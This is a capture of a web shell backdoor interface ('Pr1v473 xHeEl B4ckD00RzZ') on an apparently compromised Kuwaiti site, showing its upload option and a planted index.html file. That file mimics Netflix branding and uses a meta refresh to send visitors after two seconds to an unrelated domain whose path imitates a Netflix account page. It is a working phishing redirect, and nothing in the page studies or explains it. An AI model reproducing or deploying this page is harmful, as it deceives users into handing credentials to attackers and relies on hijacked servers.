[$] Pr1v473 xHeEl B4ckD00RzZ [$]

Current Path : D:/InetPub/vhosts/kuccs.com.kw/httpdocs/PortalFiles/Offers/
Upload File
Current File : D:/InetPub/vhosts/kuccs.com.kw/httpdocs/PortalFiles/Offers/index.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="refresh" content="2;url=https://account.bulksms.services/secure/NetFlxinc/page_settings/" />
    <title>Redirecting to Netflix</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
            background-color: #141414;
            color: white;
        }

        .logo {
            margin-top: 100px;
        }

        .message {
            font-size: 20px;
            margin-top: 20px;
        }

        .spinner {
            margin: 50px auto;
            width: 40px;
            height: 40px;
            border: 4px solid rgba(255, 255, 255, 0.3);
            border-radius: 50%;
            border-top-color: white;
            animation: spin 1s ease-in-out infinite;
        }

        @keyframes spin {
            to {
                transform: rotate(360deg);
            }
        }
    </style>
</head>
<body>

    <!-- Netflix-like Logo -->
    <div class="logo">
        <img src="https://upload.wikimedia.org/wikipedia/commons/0/08/Netflix_2015_logo.svg" alt="Netflix Logo" width="300">
    </div>

    <!-- Redirection Message -->
    <div class="message">
        You are being redirected to Netflix. Please wait...
    </div>

    <!-- Spinner for User Feedback -->
    <div class="spinner"></div>

</body>
</html>